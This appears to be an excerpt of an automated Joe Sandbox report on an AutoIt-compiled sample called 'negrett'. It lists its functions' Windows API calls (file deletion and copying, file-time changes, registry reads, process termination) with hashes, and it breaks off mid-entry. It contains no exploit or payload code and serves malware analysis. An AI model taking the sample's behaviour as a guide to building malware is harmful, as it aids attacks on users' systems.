Part of subcall function 00B12CD4: InitCommonControlsEx.COMCTL32(?), ref: 00B12D5F
Part of subcall function 00B12CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B12D6F
Part of subcall function 00B12CD4: LoadIconW.USER32 ref: 00B12D85
Part of subcall function 00B12CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B12D94

Strings

#, xrefs: 00B12C16
AutoIt v3, xrefs: 00B12C2F
0, xrefs: 00B12C0F

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: d60ed9f2f9fe3905397865e23781b5246a8115c7e7ad8a8b09c33ae346093075
Instruction ID: aecd1c5cdf1d08eb29cd8485b875094b55f293ab078478b4547bd0c111086fdd
Opcode Fuzzy Hash: d60ed9f2f9fe3905397865e23781b5246a8115c7e7ad8a8b09c33ae346093075
Instruction Fuzzy Hash: A3210975E00358BBDB10DFA9EC95AAD7FF4FB49B50F20045AE500AB6A0DBB15940CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00B13170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00B1316A,?,?), ref: 00B131D8
KillTimer.USER32 ref: 00B13204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B13227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00B1316A,?,?), ref: 00B13232
CreatePopupMenu.USER32 ref: 00B13246
PostQuitMessage.USER32 ref: 00B13267

Strings

TaskbarCreated, xrefs: 00B1322D

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: ffbf0dc81fb06d4d0e364de8ef2fdc4383d68c7db9c181abb050ca5a74d535c1
Instruction ID: 1c141a6cbc5ab01eb6074da0c2457b17edf1d1104d377ad16e8c5e5649757cd6
Opcode Fuzzy Hash: ffbf0dc81fb06d4d0e364de8ef2fdc4383d68c7db9c181abb050ca5a74d535c1
Instruction Fuzzy Hash: 90411635240244B6DB146F6C9D8EBFD3AD9E706B40F9405E5F9029B2A1EF718EC097A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B48D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5628927381e3aa7064837a3e727380d4c9efc893a780b0ed619bc8d3b4b9b97e
Instruction ID: 0a0c0c159b6800689dde225db90c4ba90aaa34d30439a63366d7171d8c923560
Opcode Fuzzy Hash: 5628927381e3aa7064837a3e727380d4c9efc893a780b0ed619bc8d3b4b9b97e
Instruction Fuzzy Hash: D8C1B074D04249AFDB11DFA8D881BAEBBF0EF19310F1441D9F915AB392CB709A41EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B12C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 00B12C91
CreateWindowExW.USER32 ref: 00B12CB2
ShowWindow.USER32(00000000), ref: 00B12CC6
ShowWindow.USER32(00000000), ref: 00B12CCF

Strings

edit, xrefs: 00B12CAC
AutoIt v3, xrefs: 00B12C89, 00B12C8E, 00B12C8F

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: dbd6902741977b128a6202f475fa539498fcbcc8a1b339ae9a06440e000d40c3
Instruction ID: d5ee656e0ea252c24f335e5349ae1a2677fa63ad3970bb63d3b84765e35836c7
Opcode Fuzzy Hash: dbd6902741977b128a6202f475fa539498fcbcc8a1b339ae9a06440e000d40c3
Instruction Fuzzy Hash: 56F0DA755402D07AEB311B1BAC89E772EBDD7C7F50B20045AF904AB5A0CA711851DAB8

Uniqueness

Uniqueness Score: -1.00%

Function 00B461FE Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B382D9,00B382D9,?,?,?,00B4644F,00000001,00000001,8BE85006), ref: 00B46258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B4644F,00000001,00000001,8BE85006,?,?,?), ref: 00B462DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B463D8
__freea.LIBCMT ref: 00B463E5

Part of subcall function 00B43820: RtlAllocateHeap.NTDLL(00000000,?,00BE1444,?,00B2FDF5,?,?,00B1A976,00000010,00BE1440,00B113FC,?,00B113C6,?,00B11129), ref: 00B43852

__freea.LIBCMT ref: 00B463EE
__freea.LIBCMT ref: 00B46413

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 30f8a9ab37b352ae30a29246378f9736f6a4e5412a77a49f96098fd4a0654167
Instruction ID: 2d1e651cffbf4266f33c366440d8f63db0c7755a289d03ebb0fd89450e1423bc
Opcode Fuzzy Hash: 30f8a9ab37b352ae30a29246378f9736f6a4e5412a77a49f96098fd4a0654167
Instruction Fuzzy Hash: 2151E372A00256BBDB258F68CC81EAF7BE9EF46710F1446A9FC05D7140EB34DE40E665

Uniqueness

Uniqueness Score: -1.00%

Function 00B82947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B82C05
DeleteFileW.KERNEL32(?), ref: 00B82C87
CopyFileW.KERNEL32 ref: 00B82C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B82CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B82CC0

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: b924c4179cd65b1d4b4beb75cbbb1677195bd8857c2695404cb6c71d200e4bae
Instruction ID: 29150e5b5303c3fc7a237ee3a80f9a58c498b2038cd30db93e3a816db9e7ba03
Opcode Fuzzy Hash: b924c4179cd65b1d4b4beb75cbbb1677195bd8857c2695404cb6c71d200e4bae
Instruction Fuzzy Hash: C6B15C72D01119ABDF25EBA4CC85EEEBBBDEF48310F1040E6F509E6151EA319A84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B13B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32 ref: 00B13B40
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00B13B61
RegCloseKey.ADVAPI32(00000000), ref: 00B13B83

Strings

Control Panel\Mouse, xrefs: 00B13B3E

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 55a6a37c431e211d61a1a180124d371e251e3beb03a028daa969d8d9a5f1199f
Instruction ID: cbe93120ce2060486058b70617e3831a75d118662b78eeb42b5fc5994cb6a41f
Opcode Fuzzy Hash: 55a6a37c431e211d61a1a180124d371e251e3beb03a028daa969d8d9a5f1199f
Instruction Fuzzy Hash: 87112AB5514208FFDB218FA5DC85AEFBBF8EF05B44B50449AA805D7110F6319E809760

Uniqueness

Uniqueness Score: -1.00%

Function 00B1DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00B632B7

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: e2ed12b369a94ee992b1aedab1a862af7442ea35dd8dc3e71647acc91225bb2f
Instruction ID: 57a94a5bae4b9a82ba8de79e0c73176e8d30b8ed71592fc9c4ebc7a7fc99409c
Opcode Fuzzy Hash: e2ed12b369a94ee992b1aedab1a862af7442ea35dd8dc3e71647acc91225bb2f
Instruction Fuzzy Hash: F2C27871A00215CFCB24CF58D881AADB7F1FF18710FA481A9E926AB391D775ED81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B43073 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B113C6,00000000,00000000,?,00B4301A,00B113C6,00000000,00000000,00000000,?,00B4328B,00000006,FlsSetValue), ref: 00B430A5
GetLastError.KERNEL32(?,00B4301A,00B113C6,00000000,00000000,00000000,?,00B4328B,00000006,FlsSetValue,00BB2290,FlsSetValue,00000000,00000364,?,00B42E46), ref: 00B430B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B4301A,00B113C6,00000000,00000000,00000000,?,00B4328B,00000006,FlsSetValue,00BB2290,FlsSetValue,00000000), ref: 00B430BF

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 5399db1a05849cdf2deb9451571e7f18921d93bca5cba6b9153cca831d6c80dc
Instruction ID: 8af617831cb11136f1fda8cc12e8728435051dbc14a32444d26c0369b262b64f
Opcode Fuzzy Hash: 5399db1a05849cdf2deb9451571e7f18921d93bca5cba6b9153cca831d6c80dc
Instruction Fuzzy Hash: 3F01A732711222ABCB314B799C85B577BD8EF46F61B290760F906E7340DB21DB01D6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B2FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00B30668

Part of subcall function 00B332A4: RaiseException.KERNEL32(?,?,?,00B3068A,?,00BE1444,?,?,?,?,?,?,00B3068A,00B11129,00BD8738,00B11129), ref: 00B33304

__CxxThrowException@8.LIBVCRUNTIME ref: 00B30685

Strings

Unknown exception, xrefs: 00B30692

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 2b23e1b78dd378d64a7e387555a7d665741d2e415b018d7ad534a994a6a80119
Instruction ID: 8fc18933de5f7b78824b97b752c4a8cbb746ae2ebf801579736b1b3466af6a36
Opcode Fuzzy Hash: 2b23e1b78dd378d64a7e387555a7d665741d2e415b018d7ad534a994a6a80119
Instruction Fuzzy Hash: 01F0C23490020EB7CB00B6A4EC96CAE77FC9E00750F7045F1B828D65A5EF71EA66C680

Uniqueness

Uniqueness Score: -1.00%

Function 00B83017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00B8302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00B83044

Strings

aut, xrefs: 00B83038

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: c4390b581a35b8aecffe19c39a020509adc54d76219d5b37e8e1f23dbb7eb4d8
Instruction ID: b54129c0d05094fc598c47a9669b035e4bdfb2e5ac78eb5951aa659f1a188e75
Opcode Fuzzy Hash: c4390b581a35b8aecffe19c39a020509adc54d76219d5b37e8e1f23dbb7eb4d8
Instruction Fuzzy Hash: 2DD05B7150031467DA2097949D0EFC77F6CD705750F0001927655D3091DEB09544CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 00B97F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B982F5
TerminateProcess.KERNEL32(00000000), ref: 00B982FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 00B984DD

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: f254bffb1c08c65b263b69ef881729674eeaaf7d29eecb14c7ae306783d58d01
Instruction ID: c354841d18ddf461cfd922c22c97caa5c4be9bc99c93162682a473aa37920020
Opcode Fuzzy Hash: f254bffb1c08c65b263b69ef881729674eeaaf7d29eecb14c7ae306783d58d01
Instruction Fuzzy Hash: 7F126B71A083419FCB14DF28C484B6ABBE5FF85314F1489ADE8998B352DB31E945CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00B45AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f0b50bef7d368e79d93c4d9ef41044413bc1f0d851077e930c789a726889bf
Instruction ID: dc604fa95de1eb61970a351f9711d535d9d21f643153f39f0791268e6da4aca0
Opcode Fuzzy Hash: a4f0b50bef7d368e79d93c4d9ef41044413bc1f0d851077e930c789a726889bf
Instruction Fuzzy Hash: 27516F71D00A0AABDB319FA9CD85FAE7FF4EF45310F140099F405A7293D6719B41AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B110F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B11BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B11BF4
Part of subcall function 00B11BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B11BFC
Part of subcall function 00B11BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B11C07
Part of subcall function 00B11BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B11C12
Part of subcall function 00B11BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B11C1A
Part of subcall function 00B11BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B11C22

Part of subcall function 00B11B4A: RegisterWindowMessageW.USER32(00000004,?,00B112C4), ref: 00B11BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B1136A
OleInitialize.OLE32 ref: 00B11388
CloseHandle.KERNEL32(00000000), ref: 00B524AB

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: b7683e6912f9d118e586ab5fc75109d232faff55a6ec49a54031b308efa0292e
Instruction ID: 72baeb9ec3b6b13c2d33015f45470437337f260275be3bbc56e11f9451b981de
Opcode Fuzzy Hash: b7683e6912f9d118e586ab5fc75109d232faff55a6ec49a54031b308efa0292e
Instruction Fuzzy Hash: 4F7190B59153808EC384DF7DA9856A93AF4FBA93443B48EAAD41ACF361EF304481CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00B154C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000001), ref: 00B1556D
SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00B1557D

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b904dbcc9a969254d5bee321ffce67cf59a363d0d085fe5a3f3efa73c4f0f3f8
Instruction ID: 89a15522696dd0d5e6361b0395603717509942492ab02e7d9615c108c251e53b
Opcode Fuzzy Hash: b904dbcc9a969254d5bee321ffce67cf59a363d0d085fe5a3f3efa73c4f0f3f8
Instruction Fuzzy Hash: AA316D71A00609EFDB24CF28C881BD9B7F6FB88714F548269E91597244D771FE94CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B486AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000), ref: 00B48704
GetLastError.KERNEL32(?,00B485CC,?,00BD8CC8,0000000C), ref: 00B4870E
__dosmaperr.LIBCMT ref: 00B48739

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 48f8cdc26b17637fbc40350037cf6f7843f5a647bf3b4a3665c46d2a6c94beb8
Instruction ID: 1a36e90ce0189fa6595ded649a10026f29105ecb4fe3da4c30fa904674f22d43
Opcode Fuzzy Hash: 48f8cdc26b17637fbc40350037cf6f7843f5a647bf3b4a3665c46d2a6c94beb8
Instruction Fuzzy Hash: 53018E33A0466027D6B167346885B7E2BC9CB82774F3A01D9F8098B1D3DEB0CE81B194

Uniqueness

Uniqueness Score: -1.00%

Function 00B82FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00B82FF2
SetFileTime.KERNEL32(00000000,?,00000000,?,?,00B82CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B83006
CloseHandle.KERNEL32(00000000), ref: 00B8300D

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: fd59a5fff3ab1e0f25d262e306dea2c4cdcacac5fa5324721e35927a53a80e9b
